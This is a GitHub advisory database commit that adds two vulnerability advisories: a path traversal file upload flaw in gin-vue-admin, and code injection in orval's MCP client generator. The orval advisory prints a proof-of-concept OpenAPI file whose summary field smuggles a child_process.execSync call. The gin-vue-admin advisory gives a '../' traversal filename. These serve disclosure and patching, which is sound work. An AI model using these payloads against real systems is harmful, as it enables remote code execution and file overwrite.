Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 4b1ec2ecfa6e · 2026-01-13T19:16:27.000Z
GHSA-3558-j79f-vvm6 GHSA-mwr6-3gp8-9jmj
diff --git a/advisories/github-reviewed/2026/01/GHSA-3558-j79f-vvm6/GHSA-3558-j79f-vvm6.json b/advisories/github-reviewed/2026/01/GHSA-3558-j79f-vvm6/GHSA-3558-j79f-vvm6.json
@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3558-j79f-vvm6",
+  "modified": "2026-01-13T19:15:13Z",
+  "published": "2026-01-13T19:15:13Z",
+  "aliases": [
+    "CVE-2026-22786"
+  ],
+  "summary": "Gin-vue-admin has arbitrary file upload vulnerability caused by path traversal",
+  "details": "### Impact\nGin-vue-admin <= v2.8.7 has a path traversal vulnerability in the breakpoint resume upload functionality. Attacker can upload any files on any directory.\n\nPath traversal vulnerabilities occur when a web application accepts user-supplied file paths without proper validation, allowing attackers to access or write files outside the intended directory. In the breakpoint_continue.go file, the MakeFile function accepts a fileName parameter through the /fileUploadAndDownload/breakpointContinueFinish API endpoint and directly concatenates it with the base directory path (./fileDir/) using os.OpenFile() without any validation for directory traversal sequences (e.g., ../).\n\nNotably, while the related makeFileContent function in the same file properly validates the fileName parameter by checking for .. sequences, the MakeFile function lacks this security control, indicating an inconsistent security implementation.\n\nAn **attacker with file upload privileges (role ID 888 - super administrator)** could exploit this vulnerability by:\n\nFirst uploading file chunks through the /fileUploadAndDownload/breakpointContinue endpoint (which has proper validation)\n\nThen calling the /fileUploadAndDownload/breakpointContinueFinish endpoint with a malicious fileName parameter containing path traversal sequences (e.g., ../../../tmp/malicious.txt)\n\nThis could lead to:\nArbitrary file creation, application process, Configuration file overwriting, Potential Remote Code Execution......\n\n### POC\n1. Use this endpoint to upload any files(include *name or *file types)\n<img width=\"1429\" height=\"788\" alt=\"Clipboard_Screenshot_1767755216\" src=\"https://github.com/user-attachments/assets/516022d6-32af-4810-abd9-945cb0bc5ae5\" />\n\n2. Then, the `filename` parameter here uses `../` to traverse to an arbitrary path. \n<img width=\"1445\" height=\"306\" alt=\"Clipboard_Screenshot_1767755256\" src=\"https://github.com/user-attachments/assets/577aa1c1-9b26-4082-b431-f9dac1cdc307\" />\n\n3. Proof\n<img width=\"837\" height=\"843\" alt=\"Clipboard_Screenshot_1767755312\" src=\"https://github.com/user-attachments/assets/66f51049-8dc8-4c94-994e-a6d8bc1196a9\" />\n\n\n### Patches\nPlease wait for the latest patch",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/flipped-aurora/gin-vue-admin"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.8.7"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-3558-j79f-vvm6"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22786"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/flipped-aurora/gin-vue-admin/commit/2242f5d6e133e96d1b359ac019bf54fa0e975dd5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/flipped-aurora/gin-vue-admin"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22",
+      "CWE-434"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T19:15:13Z",
+    "nvd_published_at": "2026-01-12T22:16:08Z"
+  }
+}
diff --git a/advisories/github-reviewed/2026/01/GHSA-mwr6-3gp8-9jmj/GHSA-mwr6-3gp8-9jmj.json b/advisories/github-reviewed/2026/01/GHSA-mwr6-3gp8-9jmj/GHSA-mwr6-3gp8-9jmj.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-mwr6-3gp8-9jmj",
+  "modified": "2026-01-13T19:12:22Z",
+  "published": "2026-01-13T19:12:22Z",
+  "aliases": [
+    "CVE-2026-22785"
+  ],
+  "summary": "orval MCP client is vulnerable to a code injection attack.",
+  "details": "### Impact\nThe MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to \"break out\" of the string literal and inject arbitrary code.\n\nHere is an example OpenAPI with the exploit\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Swagger Petstore - OpenAPI 3.0\n  description: |-\n    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about\n    Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!\n    You can now help us improve the API whether it's by making changes to the definition itself or to the code.\n    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.\n\n    Some useful links:\n    - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)\n    - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)\n  termsOfService: https://swagger.io/terms/\n  contact:\n    email: apiteam@swagger.io\n  license:\n    name: Apache 2.0\n    url: https://www.apache.org/licenses/LICENSE-2.0.html\n  version: 1.0.27-SNAPSHOT\nexternalDocs:\n  description: Find out more about Swagger\n  url: https://swagger.io\nservers:\n  - url: https://petstore3.swagger.io/api/v3\ntags:\n  - name: pet\n    description: Everything about your Pets\n    externalDocs:\n      description: Find out more\n      url: https://swagger.io\n  - name: store\n    description: Access to Petstore orders\n    externalDocs:\n      description: Find out more about our store\n      url: https://swagger.io\n  - name: user\n    description: Operations about user\npaths:\n  /pet/findByStatus:\n    get:\n      tags:\n        - pet\n      summary: Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//\n      description: Multiple status values can be provided with comma separated strings.\n      operationId: findPetsByStatus\n      parameters:\n        - name: status\n          in: query\n          description: Status values that need to be considered for filter\n          schema:\n            type: string\n      responses:\n        '200':\n          description: successful operation\n          content:\n            application/json:\n              schema:\n                type: string\n        '400':\n          description: Invalid status value\n        default:\n          description: Unexpected error\n      security:\n        - petstore_auth:\n            - write:pets\n            - read:pets\n ```\n  \n\n### Patches\nThis is fixed in version 7.18.0 or higher\n\n### Workarounds\nDo check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@orval/mcp"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "7.18.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22785"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/orval-labs/orval"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-77"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T19:12:22Z",
+    "nvd_published_at": "2026-01-12T19:16:04Z"
+  }
+}
